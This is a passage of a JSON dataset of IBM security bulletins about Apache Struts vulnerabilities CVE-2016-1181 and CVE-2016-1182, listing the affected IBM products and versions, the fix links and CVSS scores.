Summary\n\nApache Struts could allow a remote attacker to bypass security restrictions, caused by an error in the MultiPageValidator implementation. An attacker could exploit this vulnerability using a modified page parameter to bypass restrictions and launch further attacks on the system.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-1181_](<https://vulners.com/cve/CVE-2016-1181>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system. This vulnerability also affects other products. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113852_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113852>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n**CVEID:** [_CVE-2016-1182_](<https://vulners.com/cve/CVE-2016-1182>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the improper validation of input by the Validator. An attacker could exploit this vulnerability to modify validation rules and error messages. \nCVSS Base Score: 4.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113853_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113853>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nContent Collector for IBM Connections v3.0 \nContent Collector for IBM Connections v4.0 \nContent Collector for IBM Connections v4.0.1\n\n## Remediation/Fixes\n\n**Product**\n\n| **VRM**| **Remediation** \n---|---|--- \nContent Collector for IBM Connections| 3.0| Use Content Collector for IBM Connections 4.0.1.5 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.5-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>) \nContent Collector for IBM Connections| 4.0| Use Content Collector for IBM Connections 4.0.1.5 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.5-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>) \nContent Collector for IBM Connections| 4.0.1| Use Content Collector for IBM Connections 4.0.1.5 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.5-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>) \n \nFollow the steps in the readme file in the 4.0.1.5 interim fix 001 to install the interim fix applicable to your version. \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-06-17T12:17:48", "type": "ibm", "title": "Security Bulletin: OpenSource Apache Struts vulnerability in Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-17T12:17:48", "id": "6AB5B24B612744A794E7F28CC88F04C811F4BB9710FE31917EFCB65EDDDF7C9A", "href": "https://www.ibm.com/support/pages/node/292413", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:47:50", "description": "## Summary\n\nApache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-1181_](<https://vulners.com/cve/CVE-2016-1181>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113852_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113852>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n**CVEID:** [_CVE-2016-1182_](<https://vulners.com/cve/CVE-2016-1182>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the improper validation of input by the Validator. An attacker could exploit this vulnerability to modify validation rules and error messages. \nCVSS Base Score: 4.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113853_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113853>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nIBM Content Collector for File Systems v3.0 \nIBM Content Collector for File Systems v4.0 \nIBM Content Collector for File Systems v4.0.1\n\n## Remediation/Fixes\n\n**Product**\n\n| **VRM**| **Remediation** \n---|---|--- \nIBM Content Collector for File Systems| 3.0| Use IBM Content Collector for File Systems 4.0.1.5 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.5-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>) \nIBM Content Collector for File Systems| 4.0| Use IBM Content Collector for File Systems 4.0.1.5 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.5-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>) \nIBM Content Collector for File Systems| 4.0.1| Use IBM Content Collector for File Systems 4.0.1.5 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.5-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>) \n \nFollow the steps in the readme file in the 4.0.1.5 interim fix 001 to install the interim fix applicable to your version. \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-06-17T12:17:47", "type": "ibm", "title": "Security Bulletin: OpenSource Apache Struts vulnerabilities in IBM Content Collector for File Systems", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-17T12:17:47", "id": "286378C830B748E29DFAEAB7AC19693EE4565D1CAB6189EAA20A975B835DFAD6", "href": "https://www.ibm.com/support/pages/node/292427", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:45:30", "description": "## Summary\n\nApache Struts vulnerabilities affect FastBack for Workstations Central Administration Console.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-1181_](<https://vulners.com/cve/CVE-2016-1181>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113852_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113852>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n**CVEID:** [_CVE-2016-1182_](<https://vulners.com/cve/CVE-2016-1182>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the improper validation of input by the Validator. An attacker could exploit this vulnerability to modify validation rules and error messages. \nCVSS Base Score: 4.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113853_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113853>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nFastBack for Workstations Central Administration Console v6.3 \n\n## Remediation/Fixes\n\nThe fix for FastBack for Workstations CAC 6.3 will be to apply the WAS interim fix pack PI64303 to the version of WAS included with the Tivoli Integrated Portal. \nIn order to obtain the PI64303 fix refer to the WAS security bulletin: \n<http://www-01.ibm.com/support/docview.wss?uid=swg21985995> \nClick on the link for v7.0.0.0 through v7.0.0.41 interim fix pack PI64303. Click the HTTPS download link for 7.0.0.33-WS-WAS-IFPI64303. \nThere will be a Readme.txt file and a 7.0.0.33-ws-was-ifpi64303.pak file. \n \nTo apply, do the following: \n1\\. If not already at the CAC 6.3.1.1 version upgrade to this version. \n2\\. Stop the Tivoli Service: Tivoli Intergrated Portal - V2.2_TIPProfile_Port_16310 \n3\\. Using the Update Installer application (update.exe) found in the Tivoli Intergrated Portal installation directory \n(default location: C:\\IBM\\Tivoli\\Tipv2_fbws\\WebSphereUpdateInstallerV7) apply the .pak file downloaded earlier \n4\\. Restart the Tivoli Service or reboot the machine \n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-06-17T15:26:53", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Struts affects FastBack for Workstations Central Administration Console (CVE-2016-1181 and CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-17T15:26:53", "id": "BE523D88E9070A2DC41C20554C070BC6A203CA40E3C999CC7B9D52C82AF77DEF", "href": "https://www.ibm.com/support/pages/node/547735", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:56:34", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM PureApplication System. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nConsult the security bulletin [_Vulnerabilities in Apache Struts afftects IBM WebSphere Application Server _](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995>) for vulnerability details and information about fixes. \n \nThe WebSphere fixes can be installed using the IBM PureApplication System\u2019s Installation Manager Repository feature.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nPureApplication System versions 2.0, 2.1, and 2.2| IBM WebSphere Application Server 7.0.0.0 \nIBM WebSphere Application Server 8.0.0.0 \nIBM WebSphere Application Server 8.5.0.0 \nIBM WebSphere Application Server 8.5.5.0 \nIBM WebSphere Application Server 9.0.0.0 \n \n## ", "cvss3": {}, "published": "2018-06-15T07:06:02", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Struts has been identified in IBM WebSphere Application Server shipped with IBM PureApplication System (CVE-2016-1181 and CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-15T07:06:02", "id": "C9594147E388237928595F1CF759F8EC355015BE6AC29A030A2FA3207D9B6DE4", "href": "https://www.ibm.com/support/pages/node/547903", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-21T01:48:01", "description": "## Summary\n\nSecurity vulnerabilitiy exists in IBM FileNet Content Manager and IBM Content Foundation in Apache Struts.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-1181_](<https://vulners.com/cve/CVE-2016-1181>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113852_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113852>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n**CVEID:** [_CVE-2016-1182_](<https://vulners.com/cve/CVE-2016-1182>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the improper validation of input by the Validator. An attacker could exploit this vulnerability to modify validation rules and error messages. \nCVSS Base Score: 4.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113853_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113853>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L) \n\n\n## Affected Products and Versions\n\nFileNet Content Manager 5.2.0 \nIBM Content Foundation 5.2.0 \n \nNote: this vulnerability is **_not_** applicable to FileNet Content Manager 5.2.1 or IBM Content Foundation 5.2.1\n\n## Remediation/Fixes\n\nInstall one of the fixes listed below to resolve the Apache Struts security vulnerability. \n \n\n\n**Product**| **VRMF**| **APAR**| **Remediation/First Fix** \n---|---|---|--- \nFileNet Content Manager| 5.2.0| [PJ44282](<http://www.ibm.com/support/docview.wss?uid=swg1PJ44282>)| [5.2.0.5-P8CPE-IF001](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=FileNet+Product+Family&product=ibm/Information+Management/FileNet+Content+Engine&release=5.2.0.5&platform=All&function=all>) \\- Available 9/20/2016 \nIBM Content Foundation| 5.2.0| [PJ44282](<http://www.ibm.com/support/docview.wss?uid=swg1PJ44282>)| [5.2.0.5-P8CPE-IF001](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=FileNet+Product+Family&product=ibm/Information+Management/FileNet+Content+Engine&release=5.2.0.5&platform=All&function=all>) \\- Available 9/20/2016 \n \nIn the above table, the APAR links will provide more information about the fix. \nThe links in the Remediation column will take you to the location within IBM Fix Central where you can download the particular fix you need. \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-06-17T12:16:24", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Struts affects FileNet Content Manager and IBM Content Foundation (CVE-2016-1181, CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-17T12:16:24", "id": "691466DAEE06683E49687F1AD61B1DE274EE44CA9F6E86B9BF8D7D76D6346999", "href": "https://www.ibm.com/support/pages/node/285013", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:48:03", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Records Manager. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\n \nPlease consult the security bulletin [Security Bulletin: Vulnerabilities in Apache Struts affects IBM WebSphere Application Server (CVE-2016-1181 and CVE-2016-1182)](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\n \n\n\nPrincipal Product and Version(s)| Affected Supporting Product and Version \n---|--- \nIBM Records Manager 8.5, 8.5.0.1, 8.5.0.2, 8.5.0.3, 8.5.0.4, 8.5.0.5| IBM WebSphere Application Server V7.0.0.0 through 7.0.0.41 \nIBM Records Manager 8.5.0.6| IBM WebSphere Application Server V7.0.0.0 through 7.0.0.41, V8.0.0.0 through 8.0.0.12, V8.5.0.0 \nIBM Records Manager 8.5.0.7| IBM WebSphere Application Server V7.0.0.0 through 7.0.0.41, V8.0.0.0 through 8.0.0.12, V8.5.0.0 through 8.5.5.9 \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-06-17T12:16:17", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Records Manager (CVE-2016-1181 and CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-17T12:16:17", "id": "D9F3546932BD432766323A6E9A562D656E3EAC77AAB6EE3AAADFF6008E59BC30", "href": "https://www.ibm.com/support/pages/node/284115", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:47:54", "description": "## Summary\n\nStruts v2 vulnerabilities affect IBM Enterprise Records has addressed the applicable CVEs.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-1181_](<https://vulners.com/cve/CVE-2016-1181>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113852_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113852>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n**CVEID:** [_CVE-2016-1182_](<https://vulners.com/cve/CVE-2016-1182>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the improper validation of input by the Validator. An attacker could exploit this vulnerability to modify validation rules and error messages. \nCVSS Base Score: 4.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113853_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113853>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nIBM Enterprise Records v5.2.0 - 5.2.0.3\n\n## Remediation/Fixes\n\n_Product_\n\n| _VRMF_| _Remediation_ \n---|---|--- \nIBM Enterprise Records| 5.2.0 - 5.2.0.3| Use IBM Enterprise Records 5.2.0 Fix Pack 4 Interim Fix 2 \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-06-17T12:17:55", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Struts v2 affect IBM Enterprise Records", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-17T12:17:55", "id": "C6D76168198B9EF24D77F1D04BA06E30D33B0C7D71C8457114E69E1A43BB68AD", "href": "https://www.ibm.com/support/pages/node/294473", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-07T21:49:56", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of Maximo Asset Management, Maximo Asset Management Essentials, Maximo Industry Solutions (including Maximo for Energy Optimization, Maximo for Government, Maximo for Nuclear Power, Maximo for Transportation, Maximo for Life Sciences, Maximo for Oil and Gas, and Maximo for Utilities), Maximo Adapter for Primavera, SmartCloud Control Desk, Tivoli Asset Management for IT, Tivoli Service Request Manager, Change and Configuration Management Database, and TRIRIGA Energy Optimization. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult the [Security Bulletin: Vulnerabilities in Apache Struts affects IBM WebSphere Application Server (CVE-2016-1181 and CVE-2016-1182)](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nMaximo Asset Management 7.6 \nSmartCloud Control Desk 7.6 \nMaximo for Life Sciences 7.6 \nMaximo for Transportation 7.6| IBM WebSphere Application Server 8.5.5 Full Profile \nIBM WebSphere Application Server 8.5 Full Profile \nMaximo Asset Management 7.5 \nMaximo Asset Management Essentials 7.5 \nMaximo for Government 7.5 \nMaximo for Nuclear Power 7.5 \nMaximo for Transportation 7.5 \nMaximo for Life Sciences 7.5 \nMaximo for Oil and Gas 7.5 \nMaximo for Utilities 7.5 \nMaximo Adapter for Primavera 7.5 \nSmartCloud Control Desk 7.5 \nTRIRIGA Energy Optimization 1.1| IBM WebSphere Application Server 8.5.5 Full Profile \nIBM WebSphere Application Server 8.5 Full Profile \nIBM WebSphere Application Server 8.0 \nIBM WebSphere Application Server 7.0 \nMaximo Asset Management 7.1 \nMaximo Asset Management Essentials 7.1 \nMaximo Asset Management for Energy Optimization 7.1 \nMaximo for Government 7.1 \nMaximo for Nuclear Power 7.1 \nMaximo for Transportation 7.1 \nMaximo for Life Sciences 7.1 \nMaximo for Oil and Gas 7.1 \nMaximo for Utilities 7.1 \nMaximo Adapter for Primavera 7.1| IBM WebSphere Application Server 7.0 \nTivoli Asset Management for IT 7.2 \nTivoli Service Request Manager 7.2 \nChange and Configuration Management Database 7.2| IBM WebSphere Application Server 8.5.5 Full Profile \nIBM WebSphere Application Server 7.0 \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2022-09-22T03:02:31", "type": "ibm", "title": "Security Bulletin: Multiple security vulnerabilities have been identified in IBM WebSphere Application Server shipped with Asset and Service Management (CVE-2016-1181 and CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2022-09-22T03:02:31", "id": "23F8C1E67922626C0589CA86ED9B40D441D494E8B56CD8FF4A2EF76F18E6861F", "href": "https://www.ibm.com/support/pages/node/284963", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-07T21:52:48", "description": "## Summary\n\nIBM WebSphere Application Server v7.0 is shipped as a component of IBM Intelligent Operations Center. Information about security vulnerabilities affecting IBM WebSphere Application Server have been identified and published in a security bulletin.\n\n## Vulnerability Details\n\nConsult the security bulletin: [Vulnerabilities in Apache Struts affects IBM WebSphere Application Server (CVE-2016-1181 and CVE-2016-1182)](<www.ibm.com/support/docview.wss?uid=swg21985995>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\n**Principal Product and Versions**\n\n| **Affected Supporting Products and Versions** \n---|--- \nIBM Intelligent Operations Center V1.5, V1.6| IBM Intelligent Operations Center for Emergency Management V1.6 \nIBM Intelligent Operations for Water V1.0, V1.5, V1.6 \nIBM Intelligent Operations for Transportation V1.0, V1.5, V1.6 \nIBM Intelligent City Planning and Operations V1.5, V1.6 \nIBM Intelligent Operations Center V5.1| IBM Intelligent Operations Center for Emergency Management V5.1 \n \n## Remediation/Fixes\n\nDownload the correct version of the fix from the following link: [Vulnerabilities in Apache Struts affects IBM WebSphere Application Server (CVE-2016-1181 and CVE-2016-1182)](<www.ibm.com/support/docview.wss?uid=swg21985995>). Installation instructions for the fix are included in the readme document that is in the fix package.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": 